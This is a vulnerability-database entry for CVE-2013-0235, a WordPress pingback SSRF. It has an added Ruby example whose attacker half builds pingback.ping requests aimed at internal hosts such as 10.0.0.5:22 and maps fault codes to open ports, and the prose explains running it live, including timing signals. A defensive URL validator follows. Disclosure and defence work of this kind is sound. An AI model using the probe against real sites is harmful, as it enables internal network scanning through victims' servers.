CVE-2013-0235

WordPress < 3.5.1 - Server-Side Request Forgery via XMLRPC Pingback

Title source: llm

Exploitation Summary

EIP tracks 1 public exploit for CVE-2013-0235: the Metasploit module auxiliary/scanner/http/wordpress_pingback_access, published by Thomas McCarthy.

AI-analyzed exploit summary: This Metasploit module scans WordPress sites for an enabled Pingback API, which can be abused through the XML-RPC interface (xmlrpc.php) to make the server issue HTTP requests on the attacker's behalf and so port-scan hosts the server can reach. It checks for the presence of the X-Pingback response header and verifies that the pingback.ping method is actually active.

Description

The XMLRPC API in WordPress before 3.5.1 allows remote attackers to send HTTP requests to intranet servers, and conduct port-scanning attacks, by specifying a crafted source URL for a pingback, related to a Server-Side Request Forgery (SSRF) issue. No authentication is required, since pingback.ping is meant to be called by other sites. Fixed in WordPress 3.5.1 (core changeset 23330, listed under References).
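The request, the discovery check and the port-scan inference described above, followed by the pre-flight validation a pingback handler should apply to the source URL, as an added example in Ruby (the Metasploit module's language). This is not code from the Metasploit module, from EIP or from WordPress. Assumptions not stated on the page: the fault-code meanings (16 = source URL does not exist, 17 = source contains no link to the target) follow the Pingback 1.0 convention as WordPress applies it; the sample XML-RPC responses, host names and the port allow-list are constructed for illustration; safe_source_uri? is an illustrative check and not the WordPress 3.5.1 patch.

```ruby
# Added example, not code from the Metasploit module, EIP or WordPress.
require 'cgi'
require 'ipaddr'
require 'uri'

# --- Attacker side -------------------------------------------------------

# XML-RPC body for pingback.ping. SOURCE is the URL the WordPress server will
# fetch (the SSRF vector); TARGET must be a pingback-enabled post on the site.
def pingback_request(source, target)
  "<?xml version=\"1.0\"?><methodCall><methodName>pingback.ping</methodName>" \
    "<params><param><value><string>#{CGI.escapeHTML(source)}</string></value></param>" \
    "<param><value><string>#{CGI.escapeHTML(target)}</string></value></param>" \
    '</params></methodCall>'
end

# Discovery check used by the page's Metasploit module: WordPress advertises
# its XML-RPC endpoint in an X-Pingback response header when pingbacks are on.
# Returns the endpoint URL or nil.
def pingback_endpoint(headers)
  key = headers.keys.find { |h| h.to_s.casecmp('x-pingback').zero? }
  key && headers[key]
end

# Interpret the fault code WordPress returns for a pingback.ping call. The
# mapping is the Pingback 1.0 fault-code convention as used by WordPress
# (an assumption of this example, not stated on the page):
#   16  source URL does not exist      -> the fetch failed (closed/filtered)
#   17  source has no link to target   -> the fetch got an HTTP answer (open)
#   no <fault> at all                  -> pingback accepted
def classify(response_xml)
  m = response_xml.match(%r{<name>faultCode</name>\s*<value>\s*<int>(\d+)</int>}m)
  return :registered unless m
  case m[1].to_i
  when 16 then :closed_or_unreachable
  when 17 then :open_http
  else :other_fault
  end
end

# Constructed sample responses (not captured from a real server).
FAULT_16 = '<?xml version="1.0"?><methodResponse><fault><value><struct>' \
  '<member><name>faultCode</name><value><int>16</int></value></member>' \
  '<member><name>faultString</name><value><string>The source URL does not exist.</string></value></member>' \
  '</struct></value></fault></methodResponse>'
FAULT_17 = FAULT_16.sub('<int>16</int>', '<int>17</int>')
SUCCESS  = '<?xml version="1.0"?><methodResponse><params><param><value>' \
  '<string>Pingback from http://203.0.113.10/ to http://blog.example/?p=1 registered.</string>' \
  '</value></param></params></methodResponse>'

# --- Server side: the pre-flight check a pingback handler should run ------

PRIVATE_NETS = %w[0.0.0.0/8 10.0.0.0/8 127.0.0.0/8 169.254.0.0/16 172.16.0.0/12
                  192.168.0.0/16 ::1/128 fc00::/7 fe80::/10].map { |c| IPAddr.new(c) }
ALLOWED_PORTS = [80, 443, 8080] # illustrative allow-list, not WordPress's

# Refuse to fetch a pingback source unless it is http(s) on an allowed port to a
# public address. Only literal IPs are checked here: a real handler must also
# resolve hostnames and re-check the resolved address (DNS rebinding).
def safe_source_uri?(source)
  uri = URI.parse(source)
  return false unless %w[http https].include?(uri.scheme)
  host = uri.hostname
  return false if host.nil? || host.empty? || host.casecmp('localhost').zero?
  return false unless ALLOWED_PORTS.include?(uri.port)
  begin
    ip = IPAddr.new(host)
    return false if PRIVATE_NETS.any? { |net| net.family == ip.family && net.include?(ip) }
  rescue ArgumentError
    # hostname, not a literal IP: resolve and re-check in a real deployment
  end
  true
rescue URI::InvalidURIError
  false
end

if __FILE__ == $PROGRAM_NAME
  body = pingback_request('http://10.0.0.5:22/', 'http://blog.example/?p=1')
  puts "request: #{body}"
  puts "endpoint: #{pingback_endpoint('X-Pingback' => 'http://blog.example/xmlrpc.php')}"
  puts "fault 16 -> #{classify(FAULT_16)}, fault 17 -> #{classify(FAULT_17)}"
  puts "safe? #{safe_source_uri?('http://10.0.0.5:22/')}"
end
```

In a live probe the body from pingback_request is POSTed with Content-Type text/xml to the endpoint returned by pingback_endpoint, once per host:port of interest, and classify is applied to each reply. Two caveats a practitioner should keep in mind: fault 16 covers every failed fetch (closed port, filtered port, non-HTTP service that closed the connection), so it separates "answered HTTP" from "did not", not open from closed; and response time leaks a second signal, since a filtered port waits for the server's fetch timeout while a refused one returns immediately. On the defensive side, the literal-IP check is only half of the job: the handler must resolve the hostname itself, reject private or loopback answers, and then fetch the address it validated rather than resolving a second time.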

Exploits (1)

metasploit · SCANNER
by Thomas McCarthy · ruby · poc
https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/http/wordpress_pingback_access.rb


Classification: Scanner (100%)
Attack Type: SSRF
Complexity: Moderate
Reliability: Reliable
Target: WordPress (versions prior to 3.5.1)
Authentication: none needed
Prerequisites: WordPress site with exposed XML-RPC interface · Pingback API enabled
Analysis: devstral-2 · analyzed Feb 16, 2026

References (5)

Core References (5)
Product (x_refsource_confirm): http://codex.wordpress.org/Version_3.5.1
Exploit, Patch (x_refsource_confirm): http://core.trac.wordpress.org/changeset/23330
Issue Tracking (x_refsource_confirm): https://bugzilla.redhat.com/show_bug.cgi?id=904120

Scores

EPSS 0.2886
EPSS Percentile 97.9%

Details

Status published
Products (49)
wordpress/wordpress 0.71
wordpress/wordpress 1.0
wordpress/wordpress 1.0.1
wordpress/wordpress 1.0.2
wordpress/wordpress 1.1.1
wordpress/wordpress 1.2
wordpress/wordpress 1.2.1
wordpress/wordpress 1.2.2
wordpress/wordpress 1.2.3
wordpress/wordpress 1.2.4
... and 39 more
Published Jul 08, 2013
Tracked Since Feb 18, 2026